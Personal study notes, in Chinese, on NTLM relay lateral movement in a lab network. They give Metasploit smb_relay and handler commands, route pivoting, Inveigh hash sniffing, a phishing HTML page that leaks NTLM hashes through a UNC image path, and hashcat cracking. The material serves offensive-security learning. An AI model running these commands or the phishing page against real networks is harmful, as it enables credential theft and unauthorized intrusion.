11、内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews

用途:个人学习笔记,有所借鉴,欢迎指正!

目录

前提知识:

[一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线](#一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线)

1、CS权限转给MSF:

2、MSF:

3、添加路由:

4、smb_relay重发模块:

[5、受控主机输入命令:dir \\192.168.46.166\c](#5、受控主机输入命令:dir \\192.168.46.166\c)

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

1、监听拦截

2、触发拦截

2.1、钓鱼触发

3、破解密文


前提知识:

CS上线后,system高权限用户切换至低权限用户

ps命令 查看所需用户权限的进程号

steal_token 1668 切换至进程号为1668的用户权限

MSF上线后, 高权限用户切换低权限用户

migrate 1992 #1992是PID号,所需用户权限的PID

dir命令理解

一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线

192.168.46.166 kali 取得内网webserver权限建立路由能访问3网段

让内网中一台主机上线后,输入命令:dir \\192.168.46.166\c$,kali(192.168.46.166) msf的smb_relay模块做了一个转发攻击,即中继攻击,转发至192.168.3.32,最终使192.168.3.32上线到MSF。
条件:两台主机用户密码一致

1、CS权限转给MSF:

spawn l-msf

2、MSF:

监听上线:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
run

3、添加路由:

run autoroute -p    //查看当前路由表
run post/multi/manage/autoroute    //添加当前路由表
backgroup   //返回

4、smb_relay重发模块:

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32   //转发攻击目标
set lhost 192.168.46.166    //设置本地 IP
set autorunscript post/windows/manage/migrate

主动连接:
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.32
run 

5、受控主机输入命令:dir \\192.168.46.166\c$

由于kali(192.168.46.166)的smb_relay重发模块做了中继攻击,使得主机192.168.3.32上线到kali MSF

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

条件:被控主机当前管理员权限
Responder中继攻击-NTLM Hash破解
https://github.com/hashcat/hashcat/
https://github.com/Kevin-Robertson/Inveigh

1、监听拦截

Inveigh.exe

2、触发拦截

dir \\192.168.3.x\c$
2.1、钓鱼触发

http://192.168.3.31/1.html

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

3、破解密文

 hashcat -m 5600 hash pass.txt --show
相关推荐
vortex523 分钟前
信息收集系列(六):路径爬取与目录爆破
网络安全·渗透·信息收集
.Ayang1 小时前
tomcat 后台部署 war 包 getshell
java·计算机网络·安全·web安全·网络安全·tomcat·网络攻击模型
星竹2 小时前
upload-labs-master第12关详细教程
网络安全
饮长安千年月2 小时前
浅谈就如何解出Reverse-迷宫题之老鼠走迷宫的一些思考
python·网络安全·逆向·ctf
东方隐侠安全团队-千里2 小时前
网安瞭望台第3期:俄黑客 TAG - 110组织与密码攻击手段分享
网络·chrome·web安全·网络安全
亚信安全官方账号4 小时前
亚信安全发布《2024年第三季度网络安全威胁报告》
网络安全
黑客Ela6 小时前
网络安全中常用浏览器插件、拓展
网络·安全·web安全·网络安全·php
huaqiwangan6 小时前
电子远勘在侦查中有什么作用?
网络安全
G丶AEOM8 小时前
SSL/TLS,SSL,TLS分别是什么
网络·网络协议·网络安全